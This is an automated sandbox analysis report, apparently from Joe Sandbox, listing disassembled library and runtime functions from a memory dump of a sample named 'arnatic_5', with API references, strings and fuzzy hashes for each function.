Opcode ID: f1d4637f31327c7c3b937d4e725b79c4be174942d2c370cf34c3250f0ad0e111
Instruction ID: 0179904f0f36d7c16aeda9c5d6913e9f28b538670ccf835beaf7807d64c67988
Opcode Fuzzy Hash: f1d4637f31327c7c3b937d4e725b79c4be174942d2c370cf34c3250f0ad0e111
Instruction Fuzzy Hash: 1381B271A002489FDB14DF68C945B9EFBB5FF49314F209219E415B7381EB74A984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E614DD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00E61510

Part of subcall function 00E5EF6C: DName::operator+=.LIBCMT ref: 00E5EF82

Strings

%, xrefs: 00E61629

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+Name::operator+=
String ID: %
API String ID: 382699925-2291192146
Opcode ID: aadafbe65ae8f5d008682ff0ca8fd7e4ba8a4ec93a5be2e4357aad96cc8ab962
Instruction ID: 2f4c65e1acc2562b31bcf9fa6bc1a8922a0f7d5e5bf94da5d6a0e1d6896d8a6b
Opcode Fuzzy Hash: aadafbe65ae8f5d008682ff0ca8fd7e4ba8a4ec93a5be2e4357aad96cc8ab962
Instruction Fuzzy Hash: 56417175C4020A9BCF05CF95E585AEEBBF8FB44348F18209DE506B7351DB749A48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E224B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E2254F

Part of subcall function 00E5C26E: RaiseException.KERNEL32(E06D7363,00000001,00000003,00E21BCC,?,?,?,00E21BCC,?,00EDB230), ref: 00E5C2CE

Strings

ios_base::failbit set, xrefs: 00E224EE, 00E22511, 00E22533
ios_base::badbit set, xrefs: 00E224E7
ios_base::eofbit set, xrefs: 00E224F8

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 376313b790a84d20048c808dd9b9722cff0738cca1427f97b948c1323ff22d21
Instruction ID: df03175a56e910884911ff5a0a599504e1cc9546d3f80c8a22b0cd3a99d4c16a
Opcode Fuzzy Hash: 376313b790a84d20048c808dd9b9722cff0738cca1427f97b948c1323ff22d21
Instruction Fuzzy Hash: A9212772900714BFC714EF58E802BDAB7D8EB54310F04942EFA28E7641E7B0E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E6166D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00E616DE
DName::operator+.LIBCMT ref: 00E6172C
DName::DName.LIBVCRUNTIME ref: 00E61760

Strings

`$, xrefs: 00E616D7, 00E61708, 00E616DA, 00E61712

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: NameName::Name::operator+shared_ptr
String ID: `$
API String ID: 3919194733-74666722
Opcode ID: 3ca14366b176897858d7bfb22ff3c514009c2a567ebe3736155acf5ae9580c2e
Instruction ID: c556e5881268d90ba3da9f60bead0ac91b551dfd240086210ccb8c1573c480eb
Opcode Fuzzy Hash: 3ca14366b176897858d7bfb22ff3c514009c2a567ebe3736155acf5ae9580c2e
Instruction Fuzzy Hash: 58313AB09002099FCB09CFA8D545AADBBF4BB05349F08919EE525BB391D7709608CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E3AF11, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

InitOnceExecuteOnce.KERNELBASE(?,00E39A0A,?,?), ref: 00E3AF33
SetLastError.KERNEL32(0000000D,?,?,?,?,00E39A0A,?,?,00E28FAA,00000000,?,00E279F4,00EE2F04,00E290C0,00EE2F08,invalid string position), ref: 00E3AF91

Strings

4, xrefs: 00E3AF2D, 00E3AF77

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Once$ErrorExecuteInitLast
String ID: 4
API String ID: 3407056439-1614143912
Opcode ID: 2c29110c6a4b3c47ba0232611c5eb3e9c8cb0ca32ce22397ba42fbacb620d9c1
Instruction ID: afd8c122e210adb4f45bd2ca2b8b57cb470e1a6eb139d4271776c7244d811db4
Opcode Fuzzy Hash: 2c29110c6a4b3c47ba0232611c5eb3e9c8cb0ca32ce22397ba42fbacb620d9c1
Instruction Fuzzy Hash: 9411CB72304229AFCF225F65DC486AEBB69BF08754F054038F996A6260DB709C90CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00E77088, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00E7623E,-00000020,00000FA0,00000000,?,?,?,?,00000018,?,?,?), ref: 00E770D3

Strings

4, xrefs: 00E770C3
>b, xrefs: 00E770B8
InitializeCriticalSectionEx, xrefs: 00E77099, 00E770A3

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: >b$InitializeCriticalSectionEx$4
API String ID: 2593887523-1526293588
Opcode ID: 465751e0c40ed97e8983c99c941c7677d888c7150835d8bc443109de65084fdb
Instruction ID: b4b58d5294f6338a7a611bf63d73b90aa5d7592d58057327626af78ea547999a
Opcode Fuzzy Hash: 465751e0c40ed97e8983c99c941c7677d888c7150835d8bc443109de65084fdb
Instruction Fuzzy Hash: 88F09A71641308BFCB116F95DC05EAFBFA5EB04760F018159F8197A2A2CB724A25EAC1

Uniqueness

Uniqueness Score: -1.00%

Function 00E63FAE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00E63FFA

Strings

<&, xrefs: 00E63FFF
<&, xrefs: 00E63FDC, 00E63FD3
<&, xrefs: 00E63FE0

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: NameName::
String ID: <&$<&$<&
API String ID: 1333004437-1055721429
Opcode ID: 4eb599335aaa5f620538d86229d799c8253ea185eae7a68390684f515599b8b3
Instruction ID: 45fb9cf88825ea71d1f72d5d85d93134a3a4dc27da55881ffc35669fb392fcfd
Opcode Fuzzy Hash: 4eb599335aaa5f620538d86229d799c8253ea185eae7a68390684f515599b8b3
Instruction Fuzzy Hash: F4F09070604248AFD704CF54D556BD93BF4AB04349F04908CF609AF391C6B4D644CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E75519, Relevance: 6.3, APIs: 4, Instructions: 316COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E755A0

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: bdd845a9050f3447bdb6b3129bc09c3b547449ec23dc5a7a8421fcb2bfe2ef61
Instruction ID: 49dc14524689c3ec0cb7a11da161d8e3d0d82fa904bdd50abf942c2d5f74c20e
Opcode Fuzzy Hash: bdd845a9050f3447bdb6b3129bc09c3b547449ec23dc5a7a8421fcb2bfe2ef61
Instruction Fuzzy Hash: 23B18933D01B969FEB15CF58C8917BEBBA4EF11354F2492AAE449BB281C3B49D41C790

Uniqueness

Uniqueness Score: -1.00%

Function 00E625D4, Relevance: 6.2, APIs: 4, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00E6263F
operator+.LIBVCRUNTIME ref: 00E6268F
operator+.LIBVCRUNTIME ref: 00E62776
shared_ptr.LIBCMT ref: 00E627E1

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: 6453f7a674e4dc9acbd9e87b262dfc8df61dcbc4a4da6998f71718daa2a5a32e
Instruction ID: dccd78c945a0d89b6a11c4c0d10b5177f92a611e98b4ae8dbf2ac6d2da74e2cb
Opcode Fuzzy Hash: 6453f7a674e4dc9acbd9e87b262dfc8df61dcbc4a4da6998f71718daa2a5a32e
Instruction Fuzzy Hash: F551BF7084050AEFCB18CF68E944AED7FF9FB44388F04956EE619BA221D7769609CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00E6178D, Relevance: 6.1, APIs: 4, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00E61815

Part of subcall function 00E5ECFE: __aulldvrm.LIBCMT ref: 00E5ED2F

DName::operator+.LIBCMT ref: 00E61822
DName::operator=.LIBVCRUNTIME ref: 00E618A2
DName::DName.LIBVCRUNTIME ref: 00E618C2

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 4938237d692770b69ea0b0d9ce8f2d1069a5d7a64d72071ca1e2f43acb2aeab1
Instruction ID: 64a0d2c2071e32585b9647330e2c4f33144c48cf1f8558c2f45b9d3e8de89a08
Opcode Fuzzy Hash: 4938237d692770b69ea0b0d9ce8f2d1069a5d7a64d72071ca1e2f43acb2aeab1
Instruction Fuzzy Hash: 76519070D40259DFCB1ACF58E980AADBBB5FB45340F0891DAEA11BB361C7709A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E79993, Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000001,?,?,00000001,?,?), ref: 00E799E0
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E79A69
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E79A7B
__freea.LIBCMT ref: 00E79A84

Part of subcall function 00E751F3: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E38A82,?,?,00E91F4B), ref: 00E75225

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 84f0964ddbc1a4e98b33f7e89e043ff960214fa4e12b4cf789c30ff5cdf091dd
Instruction ID: 3c4e9103fdd4bc3174b063562d0c937277a55e81013ba474ee3245094cced4f0
Opcode Fuzzy Hash: 84f0964ddbc1a4e98b33f7e89e043ff960214fa4e12b4cf789c30ff5cdf091dd
Instruction Fuzzy Hash: AB31BE32A1120AAFDB259F69DC45EAF7BA5EF40314F148228FC18E7192EB35CD54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E2B380, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00E2B605

Strings

: ", xrefs: 00E2B3FF
", ", xrefs: 00E2B42A

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: ", "$: "
API String ID: 4194217158-747220369
Opcode ID: 8cbb981e1395578831f8aac675ace33edda42725d330285004bdefc005392ad8
Instruction ID: fec44518539f16723d6eba8d0ed717604563b02315584a9aaa7e9805adf76d9e
Opcode Fuzzy Hash: 8cbb981e1395578831f8aac675ace33edda42725d330285004bdefc005392ad8
Instruction Fuzzy Hash: 8F81C370A00224AFDB14EF54E885AAEBBF9FF04304F105429F456AB352EB71ED54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D744, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E809AF), ref: 00E7D767

Strings

4, xrefs: 00E7D7DD, 00E7D877, 00E7D92F
], xrefs: 00E7D8DF

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: DecodePointer
String ID: 4$]
API String ID: 3527080286-2996012371
Opcode ID: b2ea2c6d42ec34e5e831a21308dcfb923a42cd3b072e4514b0fd74a3ea6b20b0
Instruction ID: 4a040fb64e375d81eb7a8a7b214f2a22d2b25c3258638b13163eea6f3c346afa
Opcode Fuzzy Hash: b2ea2c6d42ec34e5e831a21308dcfb923a42cd3b072e4514b0fd74a3ea6b20b0
Instruction Fuzzy Hash: 1B51CD7190860ECBDF088F58EE4C6EDBBB4FF89314F20A189D489B6254CB729925CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F443, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E6F4B5
_free.LIBCMT ref: 00E6F4D5

Strings

T/, xrefs: 00E6F55E

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free
String ID: T/
API String ID: 269201875-2278804389
Opcode ID: ff1299d3324ed0fa6c8d0d8aeadbedef9fdba844271018311bb1bb3a3f651c15
Instruction ID: 1b59a9a74f414aad0a7a8b9777abbadf623d425a60616a41fc5094c8c6bfeae3
Opcode Fuzzy Hash: ff1299d3324ed0fa6c8d0d8aeadbedef9fdba844271018311bb1bb3a3f651c15
Instruction Fuzzy Hash: 8C41C172A40204AFCB20DF78F881A5AB7F6FF84354B159569E519FB291DB31ED01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CA90, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E3CBB2

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00E3CB04
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00E3CB32

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ___std_exception_copy
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 2659868963-3345525433
Opcode ID: 40c58b849ebf91b26852def0347ee347125fe3b2852300d5710419a05a3f4836
Instruction ID: 048fa436b307d04f8e4bc217ca4a509bee549d9f20cce096fa87667e7ccc56b1
Opcode Fuzzy Hash: 40c58b849ebf91b26852def0347ee347125fe3b2852300d5710419a05a3f4836
Instruction Fuzzy Hash: 91416271904219AFCB10DFA4C846BDEFBF8EF04714F10562AE811F3691EB74A508CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E64466, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E610DF: __EH_prolog3.LIBCMT ref: 00E610E6

DName::operator+.LIBCMT ref: 00E644CA

Strings

X", xrefs: 00E64474
X", xrefs: 00E644BA, 00E644BD

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: H_prolog3Name::operator+
String ID: X"$X"
API String ID: 955633245-2751444085
Opcode ID: 16999955bab6b7df71e0b75a965d2252411fea48497ac4d60d045a2242f17ae1
Instruction ID: 8a5d170416c7aaeedc82332d6e85482fb87c162a42b3eac633b4696c4e015892
Opcode Fuzzy Hash: 16999955bab6b7df71e0b75a965d2252411fea48497ac4d60d045a2242f17ae1
Instruction Fuzzy Hash: AE31F5F0D0424A9FCB18DF6CE445AA9BBF9AF08344F14909DE60AE7392D7309D45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A39F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00E7A5FA,?,00000050,?,?,?,?,?), ref: 00E7A47A

Strings

OCP, xrefs: 00E7A3F3
ACP, xrefs: 00E7A3BD

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: d52475a803cebbc5c6f36f681b9725c83c676eaa62f07861fdf89f4cf64b3576
Instruction ID: 8a4a28672307c5ee3bc073eccf6bb7509bb84309f5e524180369df9beb3a66d6
Opcode Fuzzy Hash: d52475a803cebbc5c6f36f681b9725c83c676eaa62f07861fdf89f4cf64b3576
Instruction Fuzzy Hash: D821C162A00101A6D7249F54DD49BAF63A6ABE0B58F5EE434E91DF7200F773ED408392

Uniqueness

Uniqueness Score: -1.00%

Function 00E61008, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E5EBEB: pDNameNode::pDNameNode.LIBCMT ref: 00E5EC11

DName::DName.LIBVCRUNTIME ref: 00E610C7
DName::operator+.LIBCMT ref: 00E610D5

Strings

8#, xrefs: 00E61058

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name$Name::Name::operator+NodeNode::p
String ID: 8#
API String ID: 3257498322-2445798993
Opcode ID: 5ea8a48c18cf0951ba155b572fe994ce78b8ec489a645746953f21a5322b0219
Instruction ID: 04a23d8baad5b8b31d573aa1206ea4c46ebfc1874d6c02d6d5ff53328a6b5353
Opcode Fuzzy Hash: 5ea8a48c18cf0951ba155b572fe994ce78b8ec489a645746953f21a5322b0219
Instruction Fuzzy Hash: 3E216974804249EFDF09DF90D8929EE7BB8EB04340F14549EEA16B7291EB705A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E602B9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+=.LIBCMT ref: 00E60345

Strings

\$, xrefs: 00E6034D
\$, xrefs: 00E6034A, 00E60324, 00E60354

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+=
String ID: \$$\$
API String ID: 3821211099-3469954732
